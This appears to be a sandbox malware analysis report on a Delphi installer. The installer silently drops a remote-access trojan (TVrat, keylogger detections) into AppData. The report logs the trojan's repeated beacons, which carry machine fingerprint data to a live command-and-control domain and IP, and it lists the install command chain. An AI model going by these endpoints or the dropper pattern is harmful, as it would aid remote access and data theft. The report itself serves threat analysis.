2024-11-19 17:57:47 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:47 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.
2024-11-19 17:57:47 UTC | 403 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 50103 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:48 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:48 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50106 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:49 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:49 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50109 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:50 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:50 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50112 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:52 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:52 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 50115 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:53 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:53 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 50118 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:54 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:54 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 50121 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:55 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:55 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 50124 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:55 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:55 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 50127 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:56 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:56 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 50133 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:57:58 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:57:58 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 50139 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:58:00 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:58:00 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 50142 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:58:02 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:58:02 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 50145 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:58:02 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:58:02 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 50148 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:58:04 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:58:04 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 50151 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:58:05 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:58:05 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.
2024-11-19 17:58:05 UTC | 403 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 50154 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:58:06 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:58:06 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 50157 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:58:07 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:58:07 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.
2024-11-19 17:58:07 UTC | 403 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.5 | 50160 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 17:58:08 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 17:58:08 UTC | 269 | OUT | Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID:52
Source IP:192.168.2.5
Source Port:50163
Destination IP:212.193.169.65
Destination Port:443
PID:3380
Process:C:\Users\user\AppData\Roaming\template\ast.exe
Timestamp:2024-11-19 17:58:13 UTC
Bytes transferred:134
Direction:OUT
Data:
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Timestamp:2024-11-19 17:58:13 UTC
Bytes transferred:269
Direction:OUT
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


Session ID:53
Source IP:192.168.2.5
Source Port:50166
Destination IP:212.193.169.65
Destination Port:443
Timestamp:2024-11-19 17:58:14 UTC
Bytes transferred:134
Direction:OUT
Data:
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
Timestamp:2024-11-19 17:58:14 UTC
Bytes transferred:269
Direction:OUT
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.
Timestamp:2024-11-19 17:58:14 UTC
Bytes transferred:166
Direction:IN
Data:
HTTP/1.1 200 OK
server: nginx/1.22.1
date: Tue, 19 Nov 2024 17:58:14 GMT
content-type: text/html
content-length: 98
cache-control: private
connection: close
Timestamp:2024-11-19 17:58:14 UTC
Bytes transferred:98
Direction:IN
                                                                                                                                          Data Ascii: bWKaYr#trs014.xn--80akicokc0aablc.xn--p1ai006 165 050


                                                                                                                                          Target ID:0
                                                                                                                                          Start time:12:56:01
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\Desktop\aeyh21MAtA.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\aeyh21MAtA.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:7'234'714 bytes
                                                                                                                                          MD5 hash:91444FBF43FBBB75B12DC51F3B5465EA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:12:56:01
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmp" /SL5="$20454,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'757'184 bytes
                                                                                                                                          MD5 hash:7862449E145C354D01526B0F8FB3C283
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 2%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:12:56:01
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\Desktop\aeyh21MAtA.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxc
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:7'234'714 bytes
                                                                                                                                          MD5 hash:91444FBF43FBBB75B12DC51F3B5465EA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:12:56:02
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp" /SL5="$20464,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxc
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'757'184 bytes
                                                                                                                                          MD5 hash:7862449E145C354D01526B0F8FB3C283
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 2%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:12:56:37
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\u7i3kw\9vsl3c.bat""
                                                                                                                                          Imagebase:0x790000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:12:56:37
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:12:56:37
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\u7i3kw\*" "C:\Users\user\AppData\Roaming\template\"
                                                                                                                                          Imagebase:0x190000
                                                                                                                                          File size:43'520 bytes
                                                                                                                                          MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:12:57:04
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\template\ast.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:7'543'992 bytes
                                                                                                                                          MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: 0000000A.00000000.2712015799.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\template\ast.exe, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\template\ast.exe, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Roaming\template\ast.exe, Author: Joe Security
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:12:57:17
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\template\ast.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:7'543'992 bytes
                                                                                                                                          MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:12:57:26
                                                                                                                                          Start date:19/11/2024
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\template\ast.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:7'543'992 bytes
                                                                                                                                          MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:moderate
                                                                                                                                          Has exited:true

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:4.9%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:29.5%
                                                                                                                                            Total number of Nodes:2000
                                                                                                                                            Total number of Limit Nodes:40
GetSystemDirectoryA 21161->21164 21165 6b7aaf27 GetProcAddress 21161->21165 21162->21151 21163->21171 21166 6b7aaf64 21164->21166 21164->21171 21165->21164 21165->21171 21168 6b7aaf77 GetSystemDirectoryA 21166->21168 21166->21171 21167 6b7aaff8 GetProcAddress 21167->21154 21169 6b7aaf88 21168->21169 21168->21171 21170 6b7aafda LoadLibraryA 21169->21170 21169->21171 21170->21171 21171->21154 21171->21167 21173 6b7790c9 21172->21173 21179 6b779107 21172->21179 21174 6b7b4f30 11 API calls 21173->21174 21175 6b7790d6 21174->21175 21180 6b7aacc0 GetModuleHandleA 21175->21180 21177 6b7790eb 21178 6b7790f7 GetProcAddress 21177->21178 21177->21179 21178->21179 21179->21151 21179->21152 21181 6b7aacdb 21180->21181 21182 6b7aace0 GetProcAddress 21180->21182 21181->21177 21183 6b7aad01 _strpbrk 21182->21183 21184 6b7aad08 21183->21184 21185 6b7aad2c 21183->21185 21186 6b7aad1c LoadLibraryA 21184->21186 21190 6b7aad0c 21184->21190 21187 6b7aad30 GetProcAddress 21185->21187 21188 6b7aad55 GetSystemDirectoryA 21185->21188 21186->21177 21187->21188 21191 6b7aad42 21187->21191 21189 6b7aad6c 21188->21189 21195 6b7aade4 21188->21195 21189->21189 21192 6b7aad8f GetSystemDirectoryA 21189->21192 21189->21195 21190->21177 21191->21177 21193 6b7aad9d 21192->21193 21192->21195 21194 6b7aaded LoadLibraryA 21193->21194 21193->21195 21194->21195 21195->21177 18498 6b7d0ebd 18499 6b7d0efb 18498->18499 18503 6b7d0ecb __dosmaperr 18498->18503 18508 6b7c1f49 18499->18508 18501 6b7d0ee6 RtlAllocateHeap 18502 6b7d0ef9 18501->18502 18501->18503 18503->18499 18503->18501 18505 6b7d48a6 18503->18505 18511 6b7d48d3 18505->18511 18522 6b7cf692 GetLastError 18508->18522 18510 6b7c1f4e 18510->18502 18512 6b7d48df __fassign 18511->18512 18517 6b7d2dc8 EnterCriticalSection 18512->18517 18514 6b7d48ea 18518 6b7d4926 18514->18518 18517->18514 18521 6b7d2e10 LeaveCriticalSection 18518->18521 18520 6b7d48b1 18520->18503 18521->18520 18523 6b7cf6a9 18522->18523 18526 6b7cf6af 18522->18526 18557 6b7cfb50 
